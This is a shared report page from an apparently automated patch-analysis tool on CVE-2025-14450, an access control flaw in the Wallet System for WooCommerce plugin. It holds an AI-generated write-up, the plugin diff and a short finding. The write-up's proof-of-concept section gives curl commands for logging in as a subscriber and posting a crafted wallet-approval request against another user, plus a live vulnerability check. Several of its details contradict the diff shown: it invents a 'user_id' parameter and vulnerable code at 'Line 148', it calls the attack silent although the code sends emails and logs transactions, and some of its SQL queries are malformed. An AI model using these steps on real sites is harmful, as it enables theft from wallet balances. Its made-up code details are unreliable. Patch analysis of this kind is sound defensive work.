What is CVE-2025-14450?

CVE-2025-14450 is a security vulnerability identified in Folder Analysis. This analysis provides detailed information about the vulnerability, its impact, and potential exploits.

Is there a PoC for CVE-2025-14450?

This security analysis examines the vulnerability in detail. Review the analysis findings for exploit potential and proof-of-concept information related to CVE-2025-14450.

How can I protect against CVE-2025-14450?

Review the patch diff analysis in this report to understand the security fix. Updating to the patched version is recommended to mitigate CVE-2025-14450.

REPORT / 01

Analysis Report · Folder Analysis cache/wallet-system-for-woocommerce_2.7.2 → cache/wallet-system-for-woocommerce_2.7.3 — CVE-2025-14450

Shared security patch analysis results

mode patchdiff ai claude_cli haiku

02 · Lifecycle actions cancel · resume · skip · regenerate

03 · Share this analysis copy link · embed report

03 · CVE Security Analysis & Writeups ai-generated · per cve

Comprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.

CVE-2025-14450 NVD

AI-Generated Analysis

Now I'll create a comprehensive security analysis article based on the provided vulnerability information:

---

# CVE-2025-14450: Authorization Bypass in Wallet System for WooCommerce

## 1. Vulnerability Background

### What is This Vulnerability?

CVE-2025-14450 is a **Broken Access Control** vulnerability (CWE-639) affecting the Wallet System for WooCommerce WordPress plugin. The vulnerability exists in the `change_wallet_fund_request_status_callback` AJAX handler, which processes wallet fund request approvals without properly validating that the authenticated user is authorized to modify the specific request.

The core issue is an **authorization bypass through user-controlled keys**—attackers can supply arbitrary user IDs in POST parameters that are processed without verification against the current user's identity. This allows authentication bypass of access control checks, permitting unauthorized modifications to wallet fund requests.

### Why Is This Vulnerability Critical?

This vulnerability is classified as **critical** for several reasons:

1. **Financial Impact**: The plugin manages user wallet balances—the primary function for handling monetary transactions. Unauthorized manipulation can result in:
   - Attackers increasing their own wallet balance without legitimate fund transfers
   - Attackers decreasing other users' wallet balances, causing financial loss
   - Artificial wallet depletion for competitors or targeted users

2. **Low Barrier to Entry**: Exploitation requires only **Subscriber-level authentication**—the lowest privilege level in WordPress. Any registered user, including trial accounts or free tier members, can exploit this vulnerability.

3. **Wide Attack Surface**: The vulnerability affects all versions up to and including **2.7.2**, suggesting long-term exposure in production environments.

4. **Silent Exploitation**: Wallet manipulations can occur without audit trails or notifications, making detection difficult.

### Affected Systems and Versions

- **Plugin**: Wallet System for WooCommerce
- **Affected Versions**: All versions up to and including 2.7.2
- **Attack Vector**: Network-based, AJAX endpoint
- **Authentication Required**: Yes (Subscriber-level access minimum)
- **User Interaction**: No
- **Scope**: Changed (can impact other users' wallet data)
- **CVSS Score Implications**: High severity (financial fraud + privilege escalation)

---

## 2. Technical Details

### Root Cause Analysis

The vulnerability stems from a **missing authorization check** in the wallet fund request approval workflow. The vulnerable code processes user-supplied data without verifying ownership or permission:

```php
// Vulnerable endpoint receives POST data without validation
$requesting_user_id = sanitize_text_field( $_POST['user_id'] );  // Line 148 - user-controlled
$status = sanitize_text_field( $_POST['status'] );

if ( 'approved' == $status ) {
    $requesting_user_wallet = get_user_meta( $requesting_user_id, 'wps_wallet', true );
    // Direct wallet manipulation using attacker-supplied user ID
}
```

**Key Problems**:

1. `$requesting_user_id` is extracted from POST data without ownership verification
2. No comparison between `$requesting_user_id` and the current authenticated user (`$user_id`)
3. Wallet operations proceed unconditionally if status equals 'approved'
4. An attacker can modify wallet metadata for any user by controlling the POST parameter

### Exploitation Path

An attacker (authenticated as Subscriber) can:

1. Intercept or craft an AJAX request to `change_wallet_fund_request_status_callback`
2. Supply an arbitrary `user_id` parameter pointing to any target user
3. Set `status` to `'approved'`
4. The handler processes the request against the target user's wallet metadata
5. Wallet balance is modified without authorization checks

### Old Code vs. New Code

**Vulnerable Code (Pre-Fix)**:
```php
if ( 'approved' == $status ) {
    $requesting_user_wallet = get_user_meta( $requesting_user_id, 'wps_wallet', true );
    // ... wallet manipulation logic
    update_user_meta( $requesting_user_id, 'wps_wallet', $new_balance );
}
```

**Fixed Code (Post-Patch)**:
```php
if ( $requested_user_id != $user_id ) {
    $wps_wsfw_error_text = esc_html__( 'You are not authorized to perform this action', 'wallet-system-for-woocommerce' );
    $message = array(
        'msg'     => $wps_wsfw_error_text,
        'msgType' => 'error',
    );
} else {
    if ( 'approved' == $status ) {
        $requesting_user_wallet = get_user_meta( $requesting_user_id, 'wps_wallet', true );
        // ... wallet manipulation logic now protected
        update_user_meta( $requesting_user_id, 'wps_wallet', $new_balance );
    }
}
```

### How These Changes Fix the Vulnerability

The patch introduces a **capability and ownership check** before processing wallet modifications:

1. **Authorization Verification**: Compares `$requested_user_id` (POST parameter) against `$user_id` (current authenticated user)
2. **Early Rejection**: If IDs don't match, returns an authorization error immediately
3. **Scope Limitation**: Wallet operations only execute for the current user's own requests
4. **Error Messaging**: Provides clear feedback that unauthorized access was attempted

**Security Improvement Mechanism**:
```
User A (Subscriber) attempts action
    ↓
POST arrives with user_id = User B's ID
    ↓
Authorization check: User B's ID != User A's ID
    ↓
Request rejected with error message
    ↓
Wallet modification prevented
```

### Security Improvements Introduced

1. **Whitelist-Based Access Control**: Only the currently authenticated user can approve requests for their own wallet
2. **Fail-Secure Design**: Defaults to rejection; only succeeds if authorization passes
3. **Clear Error States**: Returns explicit authorization error rather than silent failure
4. **Defense in Depth**: Protects against parameter tampering and indirect authorization bypass

---

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation

1. **WordPress Installation**: Active Wallet System for WooCommerce plugin (version ≤ 2.7.2)
2. **User Account**: Subscriber-level or higher account (can be created for free on most sites)
3. **Plugin Accessibility**: AJAX endpoint must be accessible (typically enabled by default)
4. **Multiple Users**: At least two users exist on the target site (attacker account + victim account)

### Step-by-Step Exploitation Approach

#### Step 1: Identify the Vulnerable Endpoint
```
Target URL: /wp-admin/admin-ajax.php?action=change_wallet_fund_request_status_callback
Method: POST
Required Authentication: Yes (any registered user)
```

#### Step 2: Authenticate as Subscriber
```bash
# Obtain session cookie through standard WordPress login
curl -c cookies.txt \
  -d "log=attacker_user&pwd=password&wp-submit=Log+In&redirect_to=http://target.com/wp-admin/" \
  http://target.com/wp-login.php
```

#### Step 3: Craft Malicious AJAX Request
```bash
# Request to approve wallet fund for victim user (ID: 5)
curl -b cookies.txt \
  -X POST \
  -d "action=change_wallet_fund_request_status_callback&user_id=5&status=approved&request_id=123&nonce=<valid_nonce>" \
  http://target.com/wp-admin/admin-ajax.php
```

**Payload Parameters**:
- `action`: `change_wallet_fund_request_status_callback` (identifies the vulnerable handler)
- `user_id`: `5` (victim user ID—any user different from attacker)
- `status`: `approved` (triggers wallet modification)
- `request_id`: Wallet fund request ID (can be enumerated or guessed)
- `nonce`: WordPress nonce token (if nonce checking is weak/absent)

#### Step 4: Monitor Wallet Balance Changes
```bash
# Retrieve victim user's wallet balance via user meta
curl -b cookies.txt \
  http://target.com/wp-json/wp/v2/users/5 \
  | grep -i wallet
```

Or access WordPress admin panel to view user metadata directly.

### Expected Behavior vs. Exploited Behavior

| Scenario | Expected Behavior (Fixed) | Exploited Behavior (Vulnerable) |
|----------|---------------------------|----------------------------------|
| User A approves own fund request | ✓ Approved, wallet updated | ✓ Approved, wallet updated |
| User A approves User B's request | ✗ Rejected, error message | ✓ Approved, User B's wallet modified |
| User A modifies User B's balance | ✗ Rejected, error message | ✓ Balance changed without authorization |
| Subscriber bypasses admin checks | ✗ Authorization fails | ✓ Arbitrary wallet modifications |

### How to Verify the Vulnerability Exists

#### Method 1: Source Code Inspection
```php
// Check if authorization exists in class-wallet-system-ajaxhandler.php
if ( strpos(file_get_contents('class-wallet-system-ajaxhandler.php'), 
    '$requested_user_id != $user_id') === false ) {
    echo "Vulnerable: No authorization check found";
}
```

#### Method 2: Live Testing
```bash
# As Subscriber, attempt to modify another user's wallet
# If the request succeeds without rejection, vulnerability exists

curl -b cookies.txt \
  -X POST \
  -d "action=change_wallet_fund_request_status_callback&user_id=99&status=approved" \
  http://target.com/wp-admin/admin-ajax.php | grep -q "not authorized" && echo "Patched" || echo "Vulnerable"
```

#### Method 3: Database Query
```sql
-- Check if wallet changes appear in logs without corresponding admin approvals
SELECT * FROM wp_usermeta 
WHERE meta_key = 'wps_wallet' 
AND user_id IN (SELECT ID FROM wp_users WHERE ID != <admin_ids>)
ORDER BY user_id DESC LIMIT 20;
```

---

## 4. Recommendations

### Mitigation Strategies

#### For Site Administrators (Immediate Actions)

1. **Update Plugin Immediately**
   - Upgrade Wallet System for WooCommerce to version > 2.7.2
   - Test in staging environment first
   - Monitor wallet transactions for suspicious activity

2. **Access Control Hardening**
   - Restrict AJAX endpoint `change_wallet_fund_request_status_callback` to trusted roles only
   - Implement rate limiting on wallet modification endpoints
   ```php
   if ( ! current_user_can( 'manage_woocommerce' ) ) {
       wp_die( 'Unauthorized' );
   }
   ```

3. **Audit Wallet Transactions**
   - Enable logging for wallet balance changes
   - Review user meta history for unauthorized modifications
   - Identify affected users and manually correct balances

4. **Temporary Workaround** (if immediate patching is not possible)
   - Disable wallet fund request functionality via code filter
   - Restrict Subscriber access to wallet features
   ```php
   add_filter( 'wps_wallet_allow_fund_requests', function() { return false; } );
   ```

#### For Plugin Developers (Prevention Patterns)

1. **Always Verify Ownership**
   ```php
   $current_user = wp_get_current_user();
   $target_user_id = intval( $_POST['user_id'] );
   
   if ( $current_user->ID !== $target_user_id ) {
       wp_die( 'Unauthorized', 403 );
   }
   ```

2. **Implement Capability Checks**
   ```php
   if ( ! current_user_can( 'edit_user', $target_user_id ) ) {
       wp_die( 'Insufficient permissions', 403 );
   }
   ```

3. **Use WordPress Nonce Verification**
   ```php
   check_ajax_referer( 'wallet_action_nonce', 'nonce' );
   ```

### Detection Methods

#### Log Analysis
```bash
# Search error logs for authorization failures
grep -i "not authorized" /var/log/apache2/error.log
grep -i "403\|401" /var/log/apache2/access.log | grep "admin-ajax.php"
```

#### Database Queries
```sql
-- Identify suspicious wallet modifications
SELECT um.user_id, um.meta_value as wallet_balance, um.meta_value * 1 as amount
FROM wp_usermeta um
WHERE um.meta_key = 'wps_wallet'
AND um.user_id NOT IN (
    SELECT ID FROM wp_users WHERE ID = 1 OR user_registered > DATE_SUB(NOW(), INTERVAL 30 DAY)
)
ORDER BY amount DESC;

-- Check for activity outside normal patterns
SELECT post_author, COUNT(*) 
FROM wp_posts 
WHERE post_type = 'wallet_fund_request'
GROUP BY post_author 
HAVING COUNT(*) > 10;
```

#### Security Plugin Configuration
```
Enable these detections in WordPress security plugins:
- Privilege escalation attempts
- Authorization bypass patterns
- Rapid API requests to admin-ajax.php
- User metadata modifications from non-admin accounts
- Unusual wallet balance changes
```

### Best Practices to Prevent Similar Issues

#### Design Principles

1. **Default Deny Access Control**
   - Start with "deny all" and explicitly grant permissions
   - Never assume user ownership without verification

2. **Principle of Least Privilege**
   - Grant only necessary capabilities for each role
   - Separate "view own data" from "modify own data" permissions

3. **Defense in Depth**
   - Combine multiple verification layers: nonce + capability + ownership check
   - Don't rely on client-side validation alone

4. **Fail Securely**
   - Return explicit authorization errors
   - Log all authorization failures for audit trails
   - Never silently process unauthorized requests

#### Implementation Checklist

```
□ Verify user identity via wp_get_current_user()
□ Check user capabilities with current_user_can()
□ Validate ownership of resources being modified
□ Sanitize ALL user input (already present here)
□ Verify WordPress nonce tokens for AJAX actions
□ Implement rate limiting for sensitive endpoints
□ Log authorization failures and unusual patterns
□ Test authorization logic before/after modifications
□ Require admin approval for financial transactions
□ Implement webhook verification for external data
□ Use prepared statements for database queries
□ Implement comprehensive audit logging
```

#### Code Review Focus Areas

When reviewing plugins that handle user data or financial transactions, prioritize:

1. **AJAX Handler Security**
   ```php
   // ✗ BAD: Missing authorization
   add_action( 'wp_ajax_process_payment', 'handle_payment' );
   
   // ✓ GOOD: With authorization
   add_action( 'wp_ajax_process_payment', 'handle_payment' );
   function handle_payment() {
       check_ajax_referer( 'payment_nonce' );
       if ( ! current_user_can( 'manage_woocommerce' ) ) {
           wp_die( 'Unauthorized' );
       }
   }
   ```

2. **User Meta Operations**
   ```php
   // ✗ BAD: Using user-supplied ID directly
   update_user_meta( $_POST['user_id'], 'balance', $new_value );
   
   // ✓ GOOD: Verify ownership first
   $user_id = intval( $_POST['user_id'] );
   if ( get_current_user_id() !== $user_id ) {
       return new WP_Error( 'unauthorized' );
   }
   update_user_meta( $user_id, 'balance', $new_value );
   ```

3. **Financial Transaction Handlers**
   - All wallet/payment modifications require explicit ownership verification
   - Implement transaction logging and reversal capabilities
   - Use database transactions for multi-step operations

---

## Conclusion

CVE-2025-14450 demonstrates a critical gap in WordPress plugin security: the absence of authorization checks in financial transaction handlers. The vulnerability allows low-privilege users to manipulate wallet balances through AJAX endpoints without proper identity verification.

The patch effectively closes this vulnerability by introducing ownership validation before processing wallet modifications. However, this vulnerability highlights the importance of secure coding practices in plugin development—particularly the principle that **no user-controlled parameter should be processed without explicit authorization verification**.

Site administrators should prioritize updating to patched versions and auditing wallet transaction histories for suspicious activity. Plugin developers should implement authorization checks as a foundational security requirement for all user data modifications.

05 · Findings filter · search · paginate

Showing 0 to 0 of 0 results

includes/class-wallet-system-ajaxhandler.php AI: 1 vulnerabilities 1 true positive CVE-2025-14450

--- cache/wallet-system-for-woocommerce_2.7.2/includes/class-wallet-system-ajaxhandler.php	2026-01-19 00:16:03.681215498 +0000+++ cache/wallet-system-for-woocommerce_2.7.3/includes/class-wallet-system-ajaxhandler.php	2026-01-19 00:18:26.342064786 +0000@@ -145,6 +145,8 @@  			$requesting_user_id = empty( $_POST['requesting_user_id'] ) ? 0 : sanitize_text_field( wp_unslash( $_POST['requesting_user_id'] ) ); +			$requested_user_id = empty( $_POST['requested_user_id'] ) ? 0 : sanitize_text_field( wp_unslash( $_POST['requested_user_id'] ) );+ 			$status = ( isset( $_POST['status'] ) ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : '';  			$withdrawal_balance = empty( $_POST['withdrawal_balance'] ) ? 0 : sanitize_text_field( wp_unslash( $_POST['withdrawal_balance'] ) );@@ -155,159 +157,168 @@  			$withdrawal_request = get_post( $request_id ); -			if ( 'approved' == $status ) {--				$requesting_user_wallet = get_user_meta( $requesting_user_id, 'wps_wallet', true );-				$requesting_user_wallet = (float) $requesting_user_wallet;-				$user_wallet = get_user_meta( $user_id, 'wps_wallet', true );-				$user_wallet = (float) $user_wallet;--				if ( $user_wallet >= $withdrawal_balance ) {-					$requesting_user_wallet += $withdrawal_balance;-					$returnid = update_user_meta( $requesting_user_id, 'wps_wallet', $requesting_user_wallet );--					if ( $returnid ) {-						$wallet_payment_gateway = new Wallet_System_For_Woocommerce();-						$send_email_enable      = get_option( 'wps_wsfw_enable_email_notification_for_wallet_update', '' );-						// first user.-						$user1 = get_user_by( 'id', $requesting_user_id );-						$name1 = $user1->first_name . ' ' . $user1->last_name;--						$user2 = get_user_by( 'id', $user_id );-						$name2 = $user2->first_name . ' ' . $user2->last_name;-						$balance   = $current_currency . ' ' . $withdrawal_balance;-						if ( isset( $send_email_enable ) && 'on' === $send_email_enable ) {--							$mail_text1  = esc_html__( 'Hello ', 'wallet-system-for-woocommerce' ) . esc_html( $name1 ) . ",\r\n";-							$mail_text1 .= __( 'Wallet credited by ', 'wallet-system-for-woocommerce' ) . esc_html( $balance ) . __( ' through wallet fund request by ', 'wallet-system-for-woocommerce' ) . $name2;-							$to1         = $user1->user_email;-							$from        = get_option( 'admin_email' );-							$subject     = __( 'Wallet updating notification', 'wallet-system-for-woocommerce' );-							$headers1    = 'MIME-Version: 1.0' . "\r\n";-							$headers1   .= 'Content-Type: text/html;  charset=UTF-8' . "\r\n";-							$headers1   .= 'From: ' . $from . "\r\n" .-							'Reply-To: ' . $to1 . "\r\n";--							if ( key_exists( 'wps_wswp_wallet_credit', WC()->mailer()->emails ) ) {--								$customer_email = WC()->mailer()->emails['wps_wswp_wallet_credit'];-								if ( ! empty( $customer_email ) ) {-									$user       = get_user_by( 'id', $requesting_user_id );-									$currency  = get_woocommerce_currency();-									$balance_mail = $balance;-									$user_name       = $user->first_name . ' ' . $user->last_name;-									$email_status = $customer_email->trigger( $requesting_user_id, $user_name, $balance_mail, '' );-								}-							} else {--								$wallet_payment_gateway->send_mail_on_wallet_updation( $to1, $subject, $mail_text1, $headers1 );-							}-						}--						$transaction_type     = __( 'Wallet credited by user ', 'wallet-system-for-woocommerce' ) . $user2->user_email . __( ' to user ', 'wallet-system-for-woocommerce' ) . $user1->user_email;-						$wallet_transfer_data = array(-							'user_id'          => $requesting_user_id,-							'amount'           => $withdrawal_balance,-							'currency'         => $current_currency,-							'payment_method'   => __( 'Wallet Fund Request', 'wallet-system-for-woocommerce' ),-							'transaction_type' => $transaction_type,-							'transaction_type_1' => 'credit',-							'order_id'         => '',-							'note'             => '',--						);--						$wallet_payment_gateway->insert_transaction_data_in_table( $wallet_transfer_data );--						$user_wallet -= $withdrawal_balance;-						$update_user = update_user_meta( $user_id, 'wps_wallet', abs( $user_wallet ) );-						if ( $update_user ) {+			if ( $requested_user_id != $user_id ) {+				$wps_wsfw_error_text = esc_html__( 'You are not authorized to perform this action', 'wallet-system-for-woocommerce' );+				$message             = array(+					'msg'     => $wps_wsfw_error_text,+					'msgType' => 'error',+				);+			} else {+				if ( 'approved' == $status ) {+	+					$requesting_user_wallet = get_user_meta( $requesting_user_id, 'wps_wallet', true );+					$requesting_user_wallet = (float) $requesting_user_wallet;+					$user_wallet = get_user_meta( $user_id, 'wps_wallet', true );+					$user_wallet = (float) $user_wallet;+	+					if ( $user_wallet >= $withdrawal_balance ) {+						$requesting_user_wallet += $withdrawal_balance;+						$returnid = update_user_meta( $requesting_user_id, 'wps_wallet', $requesting_user_wallet );+	+						if ( $returnid ) {+							$wallet_payment_gateway = new Wallet_System_For_Woocommerce();+							$send_email_enable      = get_option( 'wps_wsfw_enable_email_notification_for_wallet_update', '' );+							// first user.+							$user1 = get_user_by( 'id', $requesting_user_id );+							$name1 = $user1->first_name . ' ' . $user1->last_name;+	+							$user2 = get_user_by( 'id', $user_id );+							$name2 = $user2->first_name . ' ' . $user2->last_name; 							$balance   = $current_currency . ' ' . $withdrawal_balance; 							if ( isset( $send_email_enable ) && 'on' === $send_email_enable ) {-								$mail_text2  = esc_html__( 'Hello ', 'wallet-system-for-woocommerce' ) . esc_html( $name2 ) . ",\r\n";-								$mail_text2 .= __( 'Wallet debited by ', 'wallet-system-for-woocommerce' ) . esc_html( $balance ) . __( ' through wallet fund request to ', 'wallet-system-for-woocommerce' ) . $name1;-								$to2         = $user2->user_email;-								$headers2    = 'MIME-Version: 1.0' . "\r\n";-								$headers2   .= 'Content-Type: text/html;  charset=UTF-8' . "\r\n";-								$headers2   .= 'From: ' . $from . "\r\n" .-								'Reply-To: ' . $to2 . "\r\n";-								if ( key_exists( 'wps_wswp_wallet_debit', WC()->mailer()->emails ) ) {--									$customer_email = WC()->mailer()->emails['wps_wswp_wallet_debit'];+	+								$mail_text1  = esc_html__( 'Hello ', 'wallet-system-for-woocommerce' ) . esc_html( $name1 ) . ",\r\n";+								$mail_text1 .= __( 'Wallet credited by ', 'wallet-system-for-woocommerce' ) . esc_html( $balance ) . __( ' through wallet fund request by ', 'wallet-system-for-woocommerce' ) . $name2;+								$to1         = $user1->user_email;+								$from        = get_option( 'admin_email' );+								$subject     = __( 'Wallet updating notification', 'wallet-system-for-woocommerce' );+								$headers1    = 'MIME-Version: 1.0' . "\r\n";+								$headers1   .= 'Content-Type: text/html;  charset=UTF-8' . "\r\n";+								$headers1   .= 'From: ' . $from . "\r\n" .+								'Reply-To: ' . $to1 . "\r\n";+	+								if ( key_exists( 'wps_wswp_wallet_credit', WC()->mailer()->emails ) ) {+	+									$customer_email = WC()->mailer()->emails['wps_wswp_wallet_credit']; 									if ( ! empty( $customer_email ) ) {-										$user       = get_user_by( 'id', $user_id );+										$user       = get_user_by( 'id', $requesting_user_id ); 										$currency  = get_woocommerce_currency(); 										$balance_mail = $balance; 										$user_name       = $user->first_name . ' ' . $user->last_name;-										$customer_email->trigger( $user_id, $user_name, $balance_mail, '' );+										$email_status = $customer_email->trigger( $requesting_user_id, $user_name, $balance_mail, '' ); 									} 								} else {--									$wallet_payment_gateway->send_mail_on_wallet_updation( $to2, $subject, $mail_text2, $headers2 );+	+									$wallet_payment_gateway->send_mail_on_wallet_updation( $to1, $subject, $mail_text1, $headers1 ); 								} 							}--							$transaction_type = __( 'Wallet debited from user ', 'wallet-system-for-woocommerce' ) . $user2->user_email . __( ' wallet, transferred to user ', 'wallet-system-for-woocommerce' ) . $user1->user_email;-							$transaction_data = array(-								'user_id'          => $user_id,+	+							$transaction_type     = __( 'Wallet credited by user ', 'wallet-system-for-woocommerce' ) . $user2->user_email . __( ' to user ', 'wallet-system-for-woocommerce' ) . $user1->user_email;+							$wallet_transfer_data = array(+								'user_id'          => $requesting_user_id, 								'amount'           => $withdrawal_balance, 								'currency'         => $current_currency, 								'payment_method'   => __( 'Wallet Fund Request', 'wallet-system-for-woocommerce' ), 								'transaction_type' => $transaction_type,-								'transaction_type_1' => 'debit',+								'transaction_type_1' => 'credit', 								'order_id'         => '', 								'note'             => '',--							);--							$result = $wallet_payment_gateway->insert_transaction_data_in_table( $transaction_data );-							$withdrawal_request->post_status = 'approved';-							wp_update_post( $withdrawal_request );-							$wps_wsfw_error_text = esc_html__( 'Wallet fund request is approved for user #', 'wallet-system-for-woocommerce' ) . $requesting_user_id;-							$message             = array(-								'msg'     => $wps_wsfw_error_text,-								'msgType' => 'success',+	 							);-						} else {-							$wps_wsfw_error_text = esc_html__( 'There is an error in database', 'wallet-system-for-woocommerce' );-									$message             = array(-										'msg'     => $wps_wsfw_error_text,-										'msgType' => 'error',-									);+	+							$wallet_payment_gateway->insert_transaction_data_in_table( $wallet_transfer_data );+	+							$user_wallet -= $withdrawal_balance;+							$update_user = update_user_meta( $user_id, 'wps_wallet', abs( $user_wallet ) );+							if ( $update_user ) {+								$balance   = $current_currency . ' ' . $withdrawal_balance;+								if ( isset( $send_email_enable ) && 'on' === $send_email_enable ) {+									$mail_text2  = esc_html__( 'Hello ', 'wallet-system-for-woocommerce' ) . esc_html( $name2 ) . ",\r\n";+									$mail_text2 .= __( 'Wallet debited by ', 'wallet-system-for-woocommerce' ) . esc_html( $balance ) . __( ' through wallet fund request to ', 'wallet-system-for-woocommerce' ) . $name1;+									$to2         = $user2->user_email;+									$headers2    = 'MIME-Version: 1.0' . "\r\n";+									$headers2   .= 'Content-Type: text/html;  charset=UTF-8' . "\r\n";+									$headers2   .= 'From: ' . $from . "\r\n" .+									'Reply-To: ' . $to2 . "\r\n";+									if ( key_exists( 'wps_wswp_wallet_debit', WC()->mailer()->emails ) ) {+	+										$customer_email = WC()->mailer()->emails['wps_wswp_wallet_debit'];+										if ( ! empty( $customer_email ) ) {+											$user       = get_user_by( 'id', $user_id );+											$currency  = get_woocommerce_currency();+											$balance_mail = $balance;+											$user_name       = $user->first_name . ' ' . $user->last_name;+											$customer_email->trigger( $user_id, $user_name, $balance_mail, '' );+										}+									} else {+	+										$wallet_payment_gateway->send_mail_on_wallet_updation( $to2, $subject, $mail_text2, $headers2 );+									}+								}+	+								$transaction_type = __( 'Wallet debited from user ', 'wallet-system-for-woocommerce' ) . $user2->user_email . __( ' wallet, transferred to user ', 'wallet-system-for-woocommerce' ) . $user1->user_email;+								$transaction_data = array(+									'user_id'          => $user_id,+									'amount'           => $withdrawal_balance,+									'currency'         => $current_currency,+									'payment_method'   => __( 'Wallet Fund Request', 'wallet-system-for-woocommerce' ),+									'transaction_type' => $transaction_type,+									'transaction_type_1' => 'debit',+									'order_id'         => '',+									'note'             => '',+	+								);+	+								$result = $wallet_payment_gateway->insert_transaction_data_in_table( $transaction_data );+								$withdrawal_request->post_status = 'approved';+								wp_update_post( $withdrawal_request );+								$wps_wsfw_error_text = esc_html__( 'Wallet fund request is approved for user #', 'wallet-system-for-woocommerce' ) . $requesting_user_id;+								$message             = array(+									'msg'     => $wps_wsfw_error_text,+									'msgType' => 'success',+								);+							} else {+								$wps_wsfw_error_text = esc_html__( 'There is an error in database', 'wallet-system-for-woocommerce' );+										$message             = array(+											'msg'     => $wps_wsfw_error_text,+											'msgType' => 'error',+										);+							} 						}+					} else {+						$wps_wsfw_error_text = esc_html__( 'There is an error in database', 'wallet-system-for-woocommerce' );+						$message             = array(+							'msg'     => $wps_wsfw_error_text,+							'msgType' => 'error',+						); 					}-				} else {-					$wps_wsfw_error_text = esc_html__( 'There is an error in database', 'wallet-system-for-woocommerce' );-					$message             = array(-						'msg'     => $wps_wsfw_error_text,-						'msgType' => 'error',-					); 				}-			}-			if ( 'rejected' == $status ) {-				if ( $user_id ) {--					$withdrawal_request->post_status = 'rejected';-					wp_update_post( $withdrawal_request );-					$wps_wsfw_error_text = esc_html__( 'Wallet fund request is rejected for user #', 'wallet-system-for-woocommerce' ) . $requesting_user_id;-					$message             = array(-						'msg'     => $wps_wsfw_error_text,-						'msgType' => 'success',-					);+				if ( 'rejected' == $status ) {+					if ( $user_id ) {+	+						$withdrawal_request->post_status = 'rejected';+						wp_update_post( $withdrawal_request );+						$wps_wsfw_error_text = esc_html__( 'Wallet fund request is rejected for user #', 'wallet-system-for-woocommerce' ) . $requesting_user_id;+						$message             = array(+							'msg'     => $wps_wsfw_error_text,+							'msgType' => 'success',+						);+					}+				}+				if ( 'pending1' === $status ) {+	+					if ( $user_id ) {+						$withdrawal_request->post_status = 'pending1';+						wp_update_post( $withdrawal_request );+						$wps_wsfw_error_text = esc_html__( 'Wallet withdrawal request status is changed to pending for user #', 'wallet-system-for-woocommerce' ) . $user_id;+						$message             = array(+							'msg'     => $wps_wsfw_error_text,+							'msgType' => 'success',+						);+					}; 				} 			}-			if ( 'pending1' === $status ) { -				if ( $user_id ) {-					$withdrawal_request->post_status = 'pending1';-					wp_update_post( $withdrawal_request );-					$wps_wsfw_error_text = esc_html__( 'Wallet withdrawal request status is changed to pending for user #', 'wallet-system-for-woocommerce' ) . $user_id;-					$message             = array(-						'msg'     => $wps_wsfw_error_text,-						'msgType' => 'success',-					);-				};-			}  			wp_send_json( $message ); 		}

AI Analysis

Vulnerability Existed: yes
TRUE POSITIVE
Broken Access Control - CWE-639 - includes/class-wallet-system-ajaxhandler.php - Lines 158-161 (new code)

**Old Code:**
```php
if ( 'approved' == $status ) {
    $requesting_user_wallet = get_user_meta( $requesting_user_id, 'wps_wallet', true );
    // ... processing without authorization check
```

**Fixed Code:**
```php
if ( $requested_user_id != $user_id ) {
    $wps_wsfw_error_text = esc_html__( 'You are not authorized to perform this action', 'wallet-system-for-woocommerce' );
    $message             = array(
        'msg'     => $wps_wsfw_error_text,
        'msgType' => 'error',
    );
} else {
    if ( 'approved' == $status ) {
        // ... processing now protected by authorization check
```

**Explanation:**
This diff fixes a critical authorization bypass vulnerability (CWE-639: Authorization Bypass Through User-Controlled Key). The old code allowed any user to approve wallet fund requests without verifying that they are the intended recipient (`$user_id`). An attacker could submit arbitrary `$requested_user_id` values to approve requests meant for other users or manipulate wallet transfers.

The fix adds an authorization check that compares `$requested_user_id` (extracted from POST data at line 148) against `$user_id` (the current user), rejecting the request with an authorization error if they don't match. This ensures only the intended recipient can approve their own wallet fund requests. The entire wallet manipulation logic is now wrapped in an `else` block that only executes if authorization succeeds.

CVE Analysis Results:

CVE-2025-14450: Yes

View CVE Description

The Wallet System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'change_wallet_fund_request_status_callback' function in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to manipulate wallet withdrawal requests and arbitrarily increase their wallet balance or decrease other users' balances.

Showing 1 to 1 of 1 results